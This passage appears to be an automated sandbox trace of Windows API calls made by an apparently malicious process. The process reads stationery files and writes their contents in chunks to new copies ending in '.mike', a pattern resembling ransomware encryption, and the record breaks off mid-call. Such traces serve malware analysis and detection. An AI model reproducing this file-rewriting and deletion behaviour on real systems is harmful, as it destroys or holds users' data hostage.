[0053.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.477] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), fInfoLevelId=0x0, lpFileInformation=0x20fadc0 | out: lpFileInformation=0x20fadc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7)) returned 1 [0053.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.477] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.477] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.477] GetFileType (hFile=0x288) returned 0x1 [0053.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.477] GetFileType (hFile=0x288) returned 0x1 [0053.477] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.477] ReadFile (in: hFile=0x288, lpBuffer=0x20fc3c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20fc3c8*, lpNumberOfBytesRead=0x2af0c8*=0xe7, lpOverlapped=0x0) returned 1 [0053.478] CloseHandle (hObject=0x288) returned 1 [0053.479] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.479] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.479] GetFileType (hFile=0x288) returned 0x1 [0053.479] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.479] GetFileType (hFile=0x288) returned 0x1 [0053.479] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.479] WriteFile (in: hFile=0x288, lpBuffer=0x20ff644*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x20ff644*, lpNumberOfBytesWritten=0x2af0bc*=0xf0, lpOverlapped=0x0) returned 1 [0053.479] CloseHandle (hObject=0x288) returned 1 [0053.480] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.480] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0053.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.480] GetFileType (hFile=0x288) returned 0x1 [0053.480] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0053.480] GetFileType (hFile=0x288) returned 0x1 [0053.481] WriteFile (in: hFile=0x288, lpBuffer=0x2102864*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2102864*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0053.481] CloseHandle (hObject=0x288) returned 1 [0053.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.482] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe929e160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe929e160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe92c42c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.483] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2103f90 | out: lpFileInformation=0x2103f90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe929e160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe929e160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe92c42c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", dwFileAttributes=0x80) returned 0 [0053.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0053.484] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe929e160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe929e160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe92c42c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x310)) returned 1 [0053.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0053.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpFilePart=0x0) returned 0x44 [0053.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike", lpFilePart=0x0) returned 0x49 [0053.485] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.mike")) returned 1 [0053.485] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0053.486] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0053.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0053.487] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0053.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.487] GetFileType (hFile=0x288) returned 0x1 [0053.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0053.487] GetFileType (hFile=0x288) returned 0x1 [0053.487] CloseHandle (hObject=0x288) returned 1 [0053.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.488] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0053.488] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0053.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0053.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.488] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2106ccc | out: lpFileInformation=0x2106ccc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f)) returned 1 [0053.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0053.488] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2106fdc | out: lpFileInformation=0x2106fdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f)) returned 1 [0053.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0053.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0053.489] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0053.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0053.489] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0053.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0053.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.490] GetFileType (hFile=0x288) returned 0x1 [0053.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.490] GetFileType (hFile=0x288) returned 0x1 [0053.490] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0053.490] WriteFile (in: hFile=0x288, lpBuffer=0x2107df4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2107df4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0053.491] CloseHandle (hObject=0x288) returned 1 [0053.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0053.491] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), fInfoLevelId=0x0, lpFileInformation=0x2107910 | out: lpFileInformation=0x2107910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f)) returned 1 [0053.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0053.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.491] GetFileType (hFile=0x288) returned 0x1 [0053.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.491] GetFileType (hFile=0x288) returned 0x1 [0053.491] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0053.491] ReadFile (in: hFile=0x288, lpBuffer=0x2108f18, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2108f18*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0053.550] CloseHandle (hObject=0x288) returned 1 [0053.551] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.551] GetFileType (hFile=0x288) returned 0x1 [0053.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.551] GetFileType (hFile=0x288) returned 0x1 [0053.551] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0053.551] WriteFile (in: hFile=0x288, lpBuffer=0x2113480*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af0dc, lpOverlapped=0x0 | out: lpBuffer=0x2113480*, lpNumberOfBytesWritten=0x2af0dc*=0x2800, lpOverlapped=0x0) returned 1 [0053.552] CloseHandle (hObject=0x288) returned 1 [0053.553] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpFilePart=0x0) returned 0x44 [0053.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0053.553] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.553] GetFileType (hFile=0x288) returned 0x1 [0053.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0053.553] GetFileType (hFile=0x288) returned 0x1 [0053.553] SetFilePointer (in: hFile=0x288, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2800 [0053.553] ReadFile (in: hFile=0x288, lpBuffer=0x2115ecc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2115ecc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0053.553] CloseHandle (hObject=0x288) returned 1 [0053.554] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike", lpFilePart=0x0) returned 0x49 [0053.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0053.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0053.554] GetFileType (hFile=0x288) returned 0x1 [0053.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0053.554] GetFileType (hFile=0x288) returned 0x1 [0053.554] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, 